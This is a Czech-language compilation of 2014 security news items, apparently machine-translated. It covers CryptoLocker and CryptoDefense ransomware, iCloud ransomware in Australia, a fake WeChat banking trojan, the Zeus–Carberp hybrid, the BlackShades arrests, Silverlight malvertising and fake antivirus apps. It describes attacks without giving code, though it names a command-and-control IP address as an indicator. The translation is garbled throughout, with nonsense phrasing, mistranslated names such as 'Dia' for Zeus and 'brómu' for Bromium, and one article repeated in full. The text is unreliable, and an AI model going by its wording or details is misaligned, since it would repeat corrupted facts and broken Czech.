(Klikněte na obrázky pro zobrazení v plné velikosti)
Rozložení stránky odpovídá originálu velmi dobře. Uživatelé jsou konfrontováni s CAPTCHA pravidelně v obdobných místech, takže pochybuji, že to zvýší podezření.
Dále jsme vyzváni ke stažení souboru, opět za použití podobného uspořádání.
Fake Bill ke stažení
"Bill" sám o sobě je ZIP soubor, který obsahuje jednoduchý ZIP soubor, který expanduje do EXE. VirusTotal ukazuje, uhrovitý detekce:
Virus Celkové výsledky
Můžete si také přečíst úplné aktualizované výsledky here: https://www.virustotal.com/en/file/ad9692b0d589faf72121e4c390138dfe872fe913f73dd1edb699e60bab38f875/analysis/
To nevypadá jako kontrolní součet z tohoto vzorku změn mezi soubory ke stažení, takže doufám, že AV podpisy dožene rychle.
Po stažení a rozbalili, malware prezentuje jako PDF:
PDF Icon Microsoft Explorer
Ale pak, jakmile malware je spuštěn, to odhalí, že je to pravda, povaha:
Crypto Locker obrazovky
Běželi jsme to na čerstvém Windows 7 Ultimate SP1 32 bit instalace s jedním kole záplat, takže tam nebylo moc na šifrování pro Cryptolocker.
Po spuštění škodlivého kódu, systém připojen přes https na 151.248.118.193. (Vps.regruhosting.ru), mohou získat / poslat klíč. Neviděl jsem na vyhledávání DNS. SSL certifikát podepsaný sám sebou, obsahují IP adresu 213.183.60.75 jako Předmět:
Apple Ransomware Cílení iCloud Uživatelé Hits Austrálie 29.5.2014 Viry Hrst iPhone, iPad a Mac uživatele, do značné míry omezeny na Austrálii, probudil úterý objevit jejich zařízení byla přijata jako rukojmí ransomware.
Místo toho, aby jejich běžných domácích obrazovek, uživatelé byli uvítáni s poselstvím slibuje, že jejich zařízení by být uvolněn, pokud výkupné, někde mezi 50 dolarů a 100 dolarů, byla zaplacena.
Novinky kolem záplavě útoků začala šířit v neděli brzy ráno v příspěvku na fórech Apple Support , kde někteří uživatelé tvrdili, že byli probudil uprostřed noci by jejich zařízení je hlasitý Find My iPhone ping upozornění.
Příslušné hlášení o postižených obrazovkách prý řekl: "Hacked by Oleg Pliss."
Screen Shot 2014-05-27 v 5.13.33 PMI když to zní jako následné zprávy liší, první uživatel, který si stěžoval na hack prohlásil další zpráva požadoval 100 dolarů USD / EUR zasílá Paypal na konkrétní e-mailový účet k odemknutí přístroje. Další zprávy požádal uživatelům posílat peníze prostřednictvím on-line platebních služeb, jako je Moneypack a Ukash.
Za to, co stojí za to, že to není hned jasné, zda Oleg Pliss je skutečná osoba, natož název škodlivého herce za kampaň. Zatímco detaily kolem zdroje se teprve uvidí - to je více než pravděpodobné, jen přezdívkou.
Je také jasné, jak přesně se hackeři kompromisů zařízení, ale je to ve velké míře se domníval, že útočníci mohou používat hacknutý iCloud účty šířit Ransomware.
Ransomware se týká kmene malware, který omezuje přístup uživatelů, pokud výkupné - obvykle peníze přes PayPal / Moneypack / Ukash / PaySafeCard, atd. - je věnována malware autora. Jeden typ ransomware, CryptoLocker , skvěle infikovaných nahoru na 250.000 strojů - náročné 300 dolarů výkupného - v loňském roce. Gang zodpovědný za ransomware šel na to vyladit pro Android počátkem minulého měsíce .
Podle Sydney Morning Herald, které uživatelé iPhone v Queenslandu, Novém Jižním Walesu, Západní Austrálie, Jižní Austrálie a Victorie terčem režimu a několik dalších zpráv tvrdí, uživatelé v Novém Zélandu byly také hit. Uživatelé z USA se zdají být jordánskou z tohoto konkrétního vlně útoků.
V návaznosti na hacků na Adobe a více nedávno, eBay, které mají jedinečné heslo pro různé programy stala rozhodující. Pokud byl hacknutý část uživatelské základny iCloud je, nebo pokud některé jeho uživatelů používá stejné heslo pro jiné služby a byla porušena tímto způsobem, mohlo by to echo, že sentiment dále.
Apple nebude veřejně vyjádřil k otázce dosud - e-maily společnosti šly nevrácené úterý - ale to asi nebude špatný nápad pro iPhone nebo iPad uživatelů v Austrálii nebo na Novém Zélandu, aby změnily své iCloud hesla, i když útočiště 't zasáhla s ransomware ještě.
Apple se obhajoval v minulosti, že uživatelé využít své autentizační služby dvou faktorů s cílem udržet detaily účtu uživatelů tak bezpečný, jak je to možné. Realizován v loňském roce funkčnost přidává volitelnou ochrannou vrstvu na Apple ID na vrcholu obvyklé zadání hesla zařízení.
CryptoLocker Ransomware Soutěžící může mít fatální chyba 29.5.2014 Viry CryptoLocker určitě změnil Ransomware hra v loňském roce, kdy hrozil své oběti se ztrátou důležitých souborů, pokud nebyla provedena včas platba výkupné. Údajně, zločinecké gangy využívající tento nebezpečný typ ransomware se vydělávat stovky tisíc dolarů za měsíc.
Samozřejmě vidí příležitost pro finanční zisk, konkurenční kousky malware se objevují, a v návaznosti na to, co začalo CryptoLocker.
Posledním je vzorek všiml výzkumníků brómu Labs, že jsem volal CryptoDefense . Na rozdíl od CryptoLocker který se rozšířil především prostřednictvím phishingu a nevyžádané e-maily, odborníci říkají, brómu CryptoDefense je ohrožena počítače pomocí drive-by downloads.
Oběti jsou vyskočila o Java využití, které pak stáhne a spustí škodlivý software v několika fázích. Nakonec, oběť je předložen se zprávou, že soubory uložené na pevném disku jsou šifrována a musí zaplatit výkupné ve lhůtě, aby byly jejich dešifrovat, nebo cena jde nahoru. Pokud výkupné je ignorován, oběť hrozí trvalé zničení svých souborů.
Brómu v Vadim Kotov napsal na internetových stránkách společnosti, že i když CryptoDefense je konkurentem CryptoLocker, existují podobnosti mezi těmito dvěma útoky, včetně platebních metod (Bitcoin), veřejné klíče pro šifrování a že některé stejné přípony souborů jsou zaměřeny oba.
CryptoDefense, jako CryptoLocker, půjde po úřadu, fotografie a filmové soubory, ale také se zaměřuje na soubory zdrojového kódu a SSL certifikáty. To také nutí oběť k návštěvě webové stránky útočníka s cílem, aby výkupné platby; CryptoLocker poskytuje vlastní GUI pro tento účel.
Kotov, nicméně, to si implementační chybu v CryptoDefense Kotov, nicméně, dělal si o provádění chybu v CryptoDefense která by mohla umožnit za dešifrovací klíč se nachází na počítači oběti. Klíč CryptoLocker je uložen na serveru útočníka, a totéž platí i pro CryptoDefense.
"Je to špatné kódování chyba. Pokud jste si vědomi toho, soukromý klíč je k dispozici na pevném disku, "řekl Rahul Kashyap, hlavní bezpečnostní architekt brómu, který dodal, že chyba bude jistě být stanovena v novějších verzích malware, protože to byl odhalen. "Pokud jsou oběťmi sofistikované lidé, a pochopit technologii a šifrování, mohou získat sami klíče."
Někteří odborníci se mezitím přišel chytré způsoby, jak najít a obnovit zašifrované soubory, na něž se zaměřuje CryptoLocker pomocí stínové kopie systému Windows a obnovit systém. Kotov řekl, že metoda nebude fungovat s tímto útokem.
"To je jistý nástroje systému nelze obnovit soubory - stínové kopie jsou odstraněny a obnovení systému je zakázáno," řekl.
Brómu bylo sledování CryptoDefense od února, řekl Kotov.
"Zdá se, že do konce března bylo nejméně 11.000 detekcí (reálný obraz by mohl být už větší) a 34.000 dolar byly vydělal gangu za to," napsal. "Naproti tomu, CryptoLocker učinil již miliony dolarů. Tak jasně, podzemní gangy se zahřívá k myšlence krypto-Ransomware a očekáváme, že podobné ransomware přijít. "
Infekce CryptoLocker začal v vážný loni na podzim. Oběti mají tři dny, aby platby přes MoneyPak nebo Bitcoin, i když některé oběti uvedlo, že zaplatil výkupné a neobdržel dešifrovací klíč, jak jsem slíbil, podle ot US-CERT poradenství v listopadu loňského roku. Nejen, že jsou místní soubory zašifrovány, ale CryptoLocker také vypadá pro dokumenty na sdílených síťových jednotek mapovány do počítače oběti, stejně jako vyměnitelné médium, externí pevné disky a dokonce i některé cloud storage služby.
Costin Raiu, ředitel Global Research a Analysis Team na Kaspersky Lab, řekl CryptoLocker používá generace domény algoritmus dává malware až 1000 možných názvů domén, ze kterých se připojit k jeho velení a řízení infrastruktury. Raiu dodal, že Kaspersky sinkholed tři domény a sledovat více než 2700 domén se snaží kontaktovat tyto domény během třídenní lhůty v říjnu loňského roku se většina obětí v USA a Velké Británii.
"Myslíme si, že to bude stát dost velký problém, podsvětí závod svého druhu," řekl Kashyap. "CryptoLocker je údajně z 27000000 dolarů, takže verze imitátor se blíží. Zločinecké gangy vidět to jako způsob, jak vydělat rychlé peníze. Nyní se této obrovské měně Bitcoin, která je se zadlužuje malware, obáváme se, že to bude mít mnohem větší problém. "
Apple Ransomware Cílení iCloud Uživatelé Hits Austrálie 28.5.2014 Viry
Hrst iPhone, iPad a Mac uživatele, do značné míry omezeny na Austrálii, probudil úterý objevit jejich zařízení byla přijata jako rukojmí ransomware.
Místo toho, aby jejich běžných domácích obrazovek, uživatelé byli uvítáni s poselstvím slibuje, že jejich zařízení by být uvolněn, pokud výkupné, někde mezi 50 dolarů a 100 dolarů, byla zaplacena.
Novinky kolem záplavě útoků začala šířit v neděli brzy ráno v příspěvku na fórech Apple Support , kde někteří uživatelé tvrdili, že byli probudil uprostřed noci by jejich zařízení je hlasitý Find My iPhone ping upozornění.
Příslušné hlášení o postižených obrazovkách prý řekl: "Hacked by Oleg Pliss."
Screen Shot 2014-05-27 v 5.13.33 PMI když to zní jako následné zprávy liší, první uživatel, který si stěžoval na hack prohlásil další zpráva požadoval 100 dolarů USD / EUR zasílá Paypal na konkrétní e-mailový účet k odemknutí přístroje. Další zprávy požádal uživatelům posílat peníze prostřednictvím on-line platebních služeb, jako je Moneypack a Ukash.
Za to, co stojí za to, že to není hned jasné, zda Oleg Pliss je skutečná osoba, natož název škodlivého herce za kampaň. Zatímco detaily kolem zdroje se teprve uvidí - to je více než pravděpodobné, jen přezdívkou.
Je také jasné, jak přesně se hackeři kompromisů zařízení, ale je to ve velké míře se domníval, že útočníci mohou používat hacknutý iCloud účty šířit Ransomware.
Ransomware se týká kmene malware, který omezuje přístup uživatelů, pokud výkupné - obvykle peníze přes PayPal / Moneypack / Ukash / PaySafeCard, atd. - je věnována malware autora. Jeden typ ransomware, CryptoLocker , skvěle infikovaných nahoru na 250.000 strojů - náročné 300 dolarů výkupného - v loňském roce. Gang zodpovědný za ransomware šel na to vyladit pro Android počátkem minulého měsíce .
Podle Sydney Morning Herald, které uživatelé iPhone v Queenslandu, Novém Jižním Walesu, Západní Austrálie, Jižní Austrálie a Victorie terčem režimu a několik dalších zpráv tvrdí, uživatelé v Novém Zélandu byly také hit. Uživatelé z USA se zdají být jordánskou z tohoto konkrétního vlně útoků.
V návaznosti na hacků na Adobe a více nedávno, eBay, které mají jedinečné heslo pro různé programy stala rozhodující. Pokud byl hacknutý část uživatelské základny iCloud je, nebo pokud některé jeho uživatelů používá stejné heslo pro jiné služby a byla porušena tímto způsobem, mohlo by to echo, že sentiment dále.
Apple nebude veřejně vyjádřil k otázce dosud - e-maily společnosti šly nevrácené úterý - ale to asi nebude špatný nápad pro iPhone nebo iPad uživatelů v Austrálii nebo na Novém Zélandu, aby změnily své iCloud hesla, i když útočiště 't zasáhla s ransomware ještě.
Apple se obhajoval v minulosti, že uživatelé využít své autentizační služby dvou faktorů s cílem udržet detaily účtu uživatelů tak bezpečný, jak je to možné. Realizován v loňském roce funkčnost přidává volitelnou ochrannou vrstvu na Apple ID na vrcholu obvyklé zadání hesla zařízení.
Fake WeChat - New Trojan-Banker 27.5.2014 Viry
V dnešní době, finanční služby Internet se rychle rozrůstá. Stále více a více on-line finanční služby jsou přístupné z mobilních zařízení. To pomáhá zákazníkům a podporuje hospodářský rozvoj. Mobilní aplikace jsou zkoumání této nové hranice, včetně chráněných heslem platebních služeb, mimo jiné populární funkce, jako je zasílání zpráv. Pro zločince, to nabízí novou příležitost ke krádeži citlivých informací a sehnat hotovost jiných lidí.
WeChat je slavný mobilní instant messenger v Číně. To je nejvíce často používán lidmi chatování se svými přáteli a kolegy, a to také umožňuje uživatelům, aby se platby. Je to velmi snadné, ale to znamená, že budete muset svázat své bankovní údaje do svého posla účtu. Obrovský podíl na trhu WeChat také dělá to lákavý cíl pro zločince, kteří jsou rozvojovými Trojan-bankéře, aby jej napodobit.
Nedávno Kaspersky Lab zachytili nový Trojan-Banker takhle. To byl detekován jako Trojan-Banker.AndroidOS.Basti.a. Tato aplikace pro Android je tváří jako normální WeChat app na telefonu.
Požaduje některé citlivé výsady, jako je například android.permission.RECEIVE_SMS.
Autor Trojan chtěl, aby se zabránilo analytiků z reverzní inženýrství kód, takže je šifrována pomocí "bangcle secapk". Nemohli jsme získat užitečné informace z tohoto šifrovaného vzorku.
Po dekódování vzorku, jsme viděli v pravém světle. Je schopen z mnoha druhů škodlivého chování. Tam jsou také některé balíčky, aby se jeho GUI vypadat více profesionální, což z něj dělá silnější phishing nástroj.
Po spuštění se otevře speciální GUI, který umožňuje uživatelům vstup své bankovní informace související, včetně čísla platebních karet, PIN kód a číslo mobilního telefonu.
Po shromáždění všech těchto informací, je pošle na e-mail trojské autora.
Tento Trojan-Banker také zaznamenal BootReceiver. Bude se sledovat nově přijaté textové zprávy a odinstalovat vysílání z infikovaného mobilu. Ty jsou také poslal na e-mail trojské autora.
E-mailová adresa autora je prostý text v kódu. Takže můžeme jít ještě dále.
Když jsme viděli, poštovní schránky, našli jsme spoustu obětí.
I když je blokován 126 e-mailové servery, informace, které patří do mnoha obětí již bylo odcizeno a uloženy v archivu.
Jak on-line finanční služby se stále více a více populární, je třeba, aby se ještě více starat o naše soukromí. Uživatelé mobilních telefonů jsou již v ohrožení, a musíme podniknout kroky na ochranu sami. Doporučujeme vám:
Nainstalujte mobilní bezpečnostní software. Ujistěte se, že aktualizovat databáze v softwaru na nejnovější verzi. Nenavštěvují žádné podezřelé webové stránky nebo stáhnout neznámé aplikace. Než budete zadávat žádné citlivé informace, ujistěte se, že víte, kdo se ptá na to, a proč.
Zeus-Carberp Hybrid Trojan se objeví 27.5.2014 Viry Vědci objevili nový hybridní Trojan, který kombinuje prvky dvou z více notoricky známých crimewaru kmenů v posledních letech: Zeus a Carberp. To není neobvyklé, že tvůrci malwaru ukrást kousky kódu od jednoho jiný, ale oba Zeus a Carberp byly kdysi výhradně soukromé nástroje, ale zdrojový kód pro každý z trojské koně byl propuštěn a nyní podnikaví malware autoři mísí dva spolu tvořit to, co vědci nazývají Zberp.
Zdrojový kód Zeus byl propuštěn před čtyřmi lety, a v té době, vědci obávají, že uvedení zdrojový kód v rukou mas by vedlo ke vzniku mnoha nových variant trojských koní a vlny nových útoků. Některé, které se dějí, jako malware autoři dlážděné dohromady mobilní verze Zeus a Trojan i nadále velkým problémem pro oběti k tomuto dni.
Únik zdrojový kód Carberp byl více nedávno, se soubory objevil na veřejnosti v červnu 2013. Únik zdrojový kód Carberp je to novější, s soubory objevil na veřejnosti v červnu 2013. Trojan byl původně soukromý nástroj používaný skupinou útočníků v Rusku a později byl prodán do externích zákazníků, tak hodně jak $ 40,000. Stejně jako Zeus, Carberp má schopnost se schovávat před antimalware aplikací v různých směrech, ukrást citlivá data z infikovaných počítačů a stahovat nová data z příkazové a-kontrolní servery.
Zberp Trojan, které lze identifikovat podle týmu v IBM Trusteer, kombinuje některé funkce obou Dia a Carberp a má několik zajímavých možností, jak obejít bezpečnostní software. Zberp má funkci, která bude psát na klíč registru pro udržení vytrvalosti na infikovaných počítačích, a to vymaže ten klíč při startu pokaždé a pak přepsat to během odstávky. Tato funkce je navržena tak, aby se zabránilo odhalení bezpečnostní software, které vykonávají prověřování při spuštění.
"Nová Zberp Trojan, varianta Zeus VM Trojan, umožňuje počítačoví zločinci se chytit základní informace o infikovaném počítači, včetně názvu počítače, IP a další. Je možné pořizovat snímky a pošlete je na útočníka. To krade údaje předložené v HTTP formách, certifikáty uživatel SSL a dokonce i FTP a pověření POP účtu. Zberp Trojan také volitelné funkce, které umožňují webové injekce, dynamických webových injekce, MITB / MITM útoky a VNC / RDP připojení, " analýza Trusteer říká.
"Zdrojový kód příspěvek Carberp na Zberp Trojana může být viděn v jeho" hákování "technikou, běžně používané malware vývojáři ovládat prohlížeč, uchopit klíčové tahy a krást informace. To také udržuje malware "neviditelné", vyhnout detekci anti-virus a anti-malware nástrojů. "
Zberp také přijímá techniku, že některé novější kousky malware byly pomocí, běh jejich komunikaci s jejich C & C servery přes SSL. Stejně jako klíče registru vymazání techniky, pomocí protokolu SSL pro komunikaci je určen na pomoc malware vyhnout se detekci.
Donucovací se zaměřuje na uživatele BlackShades malware 27.5.2014 Viry Během dvou dnů operací odehrávajících se ve více než 10 zemích po celém světě, koordinovaných Eurojustu v Haagu a podporovaných Evropským kyberkriminalitě centra (EC3) při Europolu, tvůrci, prodejci a uživatelé BlackShades malware byly zaměřeny soudních a donucovacích orgánů.
V obou akčních dnů, 300 domovních prohlídek bylo provedeno na celém světě, a 81 lidí bylo zatčeno. Více než 1000 zařízení pro ukládání dat s podezřením na použitý do nelegálních aktivit bylo zadrženo, včetně počítačů, notebooků, mobilních telefonů, routery, externí pevné disky a USB zařízení. Značné množství hotovosti, nelegálních střelných zbraní a drog byly také zabaveny. nedávný případ v Nizozemsku BlackShades malware používán pro účely páchání trestné činnosti bylo, že 18-rok-starý muž, který infikoval nejméně 2000 počítačů, ovládání kamery oběti, aby se obrázky žen a dívek. Země, které se zavázaly opatření proti tvůrci, prodejců a uživatelů malware včetně Nizozemska, Belgie, Francie, Německo, Velká Británie, Finsko, Rakousko, Estonsko, Dánsko, USA, Kanada, Chile, Chorvatsko a Itálie. Tři koordinační schůzky se konaly v Eurojustu před akčních dnů, za účasti většiny zúčastněných zemí. Během akčních dnů, koordinační centrum bylo zřízeno v Eurojustu pomoci různých zemí tím, že poskytuje přehledy o stavu v zúčastněných zemích, jakož i poskytování právní pomoci, v případě potřeby. Zástupci Eurojustu, EC3 Europolu a FBI byli přítomni v koordinačním centru. Jako další ukázku úrovně spolupráce dosaženo tohoto koordinačního centra, EC3 Europolu byl přítomen během akčních dnů, a za předpokladu, v reálném čase analytickou podporu. EC3 bude nástrojem sledování, identifikaci obětí a analýzu dat. Troels Oerting, ředitel Evropského centra pro boj proti kyberkriminalitě (EC3) při Europolu řekl: "Tento případ je dalším příkladem kritické potřebě koordinované vymáhání práva operace proti Rostoucí počet kybernetických zločinců působících na evropské i celosvětové úrovni. EC3 bude i nadále - společně s Eurojustem a dalšími partnery - pracovat neúnavně podporovat naše partnery v boji proti podvodníkům a dalších kybernetických zločinců, kteří využívají internetu k páchání trestné činnosti. Práce zdaleka není u konce, ale naše spolupráce spolupracovat přes hranice zvýšila, a máme co do činění s případy průběžně ". pan Koen Hermans, asistentka národního člena za Nizozemsko, poznamenal: "Tento případ je silný připomíná, že nikdo není v bezpečí při používání internetu, a měl by sloužit jako varování a zastrašující pro ty, jež se podílejí na výrobě a používání tohoto softwaru. To se týká nejen obětí, ale i pachatelů trestných a škodlivých činů. Počet zemí zapojených do této operace ukázala, že vlastní hodnotu koordinačních schůzek Eurojustu a koordinačních center ". Klíčové postavy na první pohled:
Operace prováděné v Holandsku, Belgii, Francii, Německu, Velké Británii, Finsku, Rakousku, Estonsku, Dánsku, USA, Kanadě, Chile, Chorvatsku a Itálii Více než 80 zatčení 300 domovních prohlídek Více než 1000 zařízení pro ukládání dat chytil.
Crytodefense infekce, některé získané poznatky 26.5.2014 Viry
Před několika týdny jsem pracoval na cryptodefense incidentu. Pár věcí se provádí přímo v organizaci a některé ne tak dobře. Nicméně v tomto konkrétním případě je šťastný (ish) konec.
Cryptodefense dělal jeho vzhled kolem únoru letošního roku na zadní straně úspěchu Cryptolocker. Základy zůstávají stejné a když jednou infikován malware vyhledává PDF, DOC (X), jpg a několik dalších typů dokumentů a zašifruje ty. Soubory jsou zašifrovány pomocí RSA 2048 bitový klíč, který je umístěn v uživatelské AppData Directory Aplikace pak začne šifrování souborů v různých adresářích. Z mactime časové ose se / user / adresáře se provádí nejprve stejně jako recyklace bin.
Každý adresář obsahuje šifrované soubory, má také tři soubory v nich, počínaje HOW_DECRYPT. Tento soubor obsahuje pokyny, jak se mají soubory dešifrovat po zaplacení.
Tři soubory poskytují návod, jak dešifrovat soubor, nebo přesněji uvést odkaz na místo, kde si můžete zaplatit, aby si aplikace dešifrovat, který bude používat klávesu na vašem počítači k dešifrování souborů.
Dopad tohoto konkrétního malware může být zničující. Při pohledu na to, co zbylo z pevný disk každý adresář, který vypadá, že může mít dokumenty nebo obrázky v ní byl dotkl. To zahrnuje věci jako Dropbox a sdílených síťových složek. V incidentu jinde na začátku roku vnější harddrives byly zašifrovány.
AV produkt používá nevyzvedl tuto konkrétní variantu, ani filtry webového obsahu. AV se však najít nějaký malware (možná související) na stroji kolem stejného času šifrovací procesy začaly. To však nebyl reagoval na uživatele nebo IT.
Takže jaké byly získané poznatky v tomto případě? No pro začátek zálohování je váš přítel. V tomto konkrétním případě měla organizace dobré zálohování souborů na serverech. Takže tyto soubory mohou být nahrazeny ze záloh. Soubory Dropbox byly také v pořádku, protože mají předchozí verze dokumentu jsou k dispozici. Místní soubory na strojích však neměl zálohy, takže to bylo v podstatě ztratil (pokud je napaden před dubnem 2014 verzi můžete mít klíč) *.
Další poučení bylo, aby se AV odpovědi vážněji. Jen proto, že AV říká, že to má čistit něco, co nemusí nutně znamenat, že všechno je pryč, jen bity to ví. V tomto případě je ujít škodlivé soubory (pravděpodobně součástí bing bar zařízení, které se stalo před počáteční infekce), ale zvedl jiný odpad, který byl spuštěn na počítači. Možná náhoda, ale ... Proces šifrování trvalo několik hodin. Kdyby stroj byl vytažen ze sítě, kdy byla nákaza si všiml, by byly postiženy méně soubory.
Takže ve zkratce AV není dokonalá, ale reagovat na to vám řekne, co byli nakaženi. Za druhé jsou životaschopné zálohování, včetně souborů o roamingu strojů jako jsou notebooky. Pokud ne, být připraven vyklopit peníze nebo projít bolestnou dešifrování cvičení (až se začnou dávat klíče jinde).
Na zdraví
Mark H - Shearwater
Malvertising Přesměrování na Microsoft Silverlight využije 20.5.2014 Viry
Skutečnost, že Netflix představuje jednu třetinu internetového provozu během špičky ve večerních hodinách, a že to běží na platformě Microsoft Silverlight, je prostě příliš lákavé kombinace pro hackery, aby se jich vzdali.
Již podruhé za šest měsíců skupiny trestní hackerů jsou nulování na Silverlight zranitelnosti s cílem šířit malware, který vede k systému kompromisu a ztrátě dat na oběti.
Tentokrát zločinci pronikli druhou nejpopulárnější on-line reklamní síť, AppNexus, s malvertising, který přesměruje oběti, někdy i přes několik chmele, na škodlivé weby hosting Rybář Exploit Kit , který byl načten s různými využije pro Silverlight zranitelnosti.
Silverlight, podobně jako Adobe Flash, Microsoft je plug-in pro streamování médií o prohlížečích a je možná nejvíce známý pro použití v grafické služby streamování Netflix je.
Nedávná kampaň všiml výzkumníků Cisco špičatý mezi 7. května a 13. května představuje jak vysoce jak 18 procent z celkového počtu HTTP požadavků na stránky hosting sadu. Souprava v této kampani také hostí využije pro Flash a Java, ačkoli žádný z činů Java byla spuštěna. Oběti jsou ohroženy pomocí drive-by download, kde a škodlivé reklamy přesměrování prohlížeče na jiný škodlivý banner, který ho přesměruje opět na Angler Exploit Kit vstupní stránku. Kdysi tam, využívat je dodáván a Trojan je dodáván na infikovaný stroj, který se otevře dva posluchače porty a otevře TCP spojení ke vzdálenému serveru hostitelem v Brazílii, řekl Cisco.
Zločinci v pozadí této kampaně se pravděpodobně opírá o skutečnost, že průmysl byl spotřebován s Flash a Java exploity Zločinci v pozadí této kampaně je pravděpodobné, že bankovnictví na skutečnost, že průmysl byl spotřebován s Flash a Java činů, z nichž oba byly záplaty mnohokrát v posledních dvou letech, a které začaly cílové Silverlight.
"Java a Flash jsou silně využívány v průběhu let, a prodejci jsou stále dobré na psaní motory, které odhalí slabá místa v těchto knihovnách," řekl Craig Williams, technický vedoucí, Threat Research analýza a komunikace společnosti Cisco. "Silverlight nebyl využit moc. Tam jsou některé omezené CVEs, ale málo, jsou velmi rozšířené. Co můžeme být svědky zde je bod zvratu, kde jsou Java využije odhalení a jaké další formáty mohou hackeři využít. "
I když tento konkrétní Silverlight kampaň se uklidnil, protože dodavatelé, jako například Cisco přidali podpisy a detekční schopnosti pro to, to bylo vážně dip ve vodách pro útočníky. DNS dotazy na těchto konkrétních Angler domén jsou rozprostřeny ve většině ze světa, soustředil těžce v Evropě a Severní Americe.
"Tato dodávka používá valivý XOR šifrování poplést, co se děje. To je důležitá aktualizace v této kampani, "řekl Levi Gundert, další technické Vedoucí, Threat Research analýza a komunikace společnosti Cisco. To znamená, že jsou docela vážně o tom, co děláte. Zmatku je to výzva pro detekci a je jasné, že chtějí, aby se vyhnula výzkumných pracovníků. "
V listopadu, zneužití kódu je cílení dva paměťové zranitelná místa v Silverlight vynořil, když chyby se oprava v březnu Microsoft. Cisco očekává, že více Silverlight využije na povrch s téměř 60 procent bohatých internetových aplikací, které podporují ji.
Cisco zveřejnil seznamy ukazatelů kompromisu, včetně seznamu referencí , Angler domén , vstupní stránky, plné URI a souvisejících Angler domén .
Falešný antivirový - Klony útočí 19.5.2014 Viry
Odborníci nedávno objevil na podvod antivirovou aplikaci na Google Play jít podle jména Virus Shield. Výrazným rysem této konkrétní aplikace byla skutečnost, že uživatelé museli platit za to - většina fake AV může být zpočátku zdarma stáhnout. To znamenalo, že jeho tvůrci okamžitě začít vydělávat peníze a neměl požadovat platby od uživatelů za účelem odstranění "malware", která údajně byla zjištěna na svých počítačích. Aby se zabránilo negativní recenze na Google Play vše, co bylo zapotřebí bylo, aby to vypadalo, že aplikace dělal něco užitečného.
Virus Shield následovala řada dalších podobných falešných aplikací. Na začátku minulého týdne, například, jsme zjistili dvě poměrně zajímavé falešné antivirové programy.
První falešné app byla objevena na Windows Phone Store, což samo o sobě bylo neobvyklé - podvodníci mají tendenci používat Google Play. Tato aplikace, která také měla být zaplacena dopředu, šel podle jména Kaspersky Mobile. Skutečnost, že neexistuje žádný program s tímto názvem v produktové řadě společnosti Kaspersky Lab neodradilo podvodníky - oni zřejmě nečekal, že někdo všimnout.
Tato falešná aplikace předstírá vykonávat nějakou užitečnou činnost, jako jsou soubory "skenování". Ale podívejte se pozorně na obrazovky a uvidíte, že stejně jako představení "průběh prověřování" je údajně provádí "heuristickou analýzu". Zpravidla antivirové řešení nezobrazují samostatný pruh pro heuristické analýzy pokroku. Nicméně, podvodníci Zdá se, ukázat trochu více znalostí o softwarových vývojářů a jejich název, klesá nebyl omezen na společnosti Kaspersky Lab. Falešné AV Tvůrci nahrál četné jiné druhy placených aplikací na Windows Phone Store že použité názvy a loga několika populárních programů.
Patří k nim Google Chrome pro 99 rublů (asi 2,80 dolarů), a Google Chrome Pro, který z nějakého důvodu nákladů jen 59 rublů. Tam jsou některé "antivirus" aplikací z neznámých vývojářů, ale při bližším ohledání Jediný rozdíl mezi nimi a společností Kaspersky Mobile se ukázalo být logo a barvy používané v rozhraní.
Ale nejzajímavější ze všech byl Virus Shield na 69 rublů (cca $ 2) - stejné falešné AV jsme se zmínili výše -, který byl objeven na Google Play.
To je dobrý příklad toho, jak jeden úspěšný podvod plodí řadu klonů. Místo toho, aby jen jeden falešné AV, podvodníci nabízejí desítky falešných aplikací, kopírování designu, ale ne funkčnost originálu.
Druhý falešný app na vědomí, že jsme zjistili, byla pro prodej na Google Play a byl nazýván Kaspersky Anti-Virus 2014. Jen pro upřesnění, není tam žádný Kaspersky Lab mobilní výrobek tímto jménem. Snímek použitý na stránce falešné aplikace byla jednoduše zkopírovat z oficiálního Kaspersky Internet Security pro Android stránce.
Falešná aplikace nemá absolutně nic společného ochranu zařízení uživatele - tvůrci se ani neobtěžoval přidat simulaci skeneru. Místo toho, aby bezpečnostní řešení kupující dostane nic víc, než falešné aplikace, jejichž funkčnost je omezena na náhodné prohlášení v duchu a Magic 8-Ball nastavit na pozadí aplikace Kaspersky Anti-Virus logem. Produkty Kaspersky Lab detekuje aplikace jako Trojan-FakeAV.AndroidOS.Wkas.a.
Je docela možné, že stále více a více z těchto falešných aplikací se začnou zobrazovat. Jedna věc je jistá - mechanismy zavedené oficiálních obchodech jsou zjevně schopni bojovat s podvody, jako je tento.
PS Buď tam bylo příliš mnoho příjemců pro falešné Kaspersky Internet Security pro Android, nebo chamtivost dostal lepší tvůrců - v každém případě, že se rozhodl přitvrdit. Nehledě na "antivirový" app pro 142 rublů, jsme objevili další aplikace na straně podvodníky "Google Play, který byl na prodej za 3556 rublů (asi 100 dolarů).
Snímky obrazovek tohoto nákladného programu nesoucího název "Jsem bohatý" připomínaly které se používají v aplikaci pro iOS se stejným názvem, jehož funkce spočívala výhradně zobrazovat obraz rubínem a titulek říká: "Já jsem bohatý". Rozhodli jsme se zaplatit požadovanou cenu 100 dolarů za aplikace, ale jsme si jisti, že jeho funkčnost je příliš neliší od své dřívější jmenovec, nebo některý z dalších falešných aplikací od podvodníky v otázce.
Obrana neexistuje: Před zákeřnou virovou hrozbou neochrání ani silné heslo
18.5.2014 Viry V posledních dnech se internetem šíří nebezpečný virus, který cílí na routery – základní kameny domácích i firemních sítí, prostřednictvím kterých všechny připojené počítače komunikují mezi sebou a přistupují k internetu. Obrana přitom neexistuje, nepomáhají ani preventivní doporučení bezpečnostních expertů, aby na svých zařízeních lidé nastavili silná hesla. Ani silná přístupová hesla tedy nejsou zárukou toho, že uživatel bude v bezpečí. PŘEHLEDNĚ: Jak probíhá útok na router?
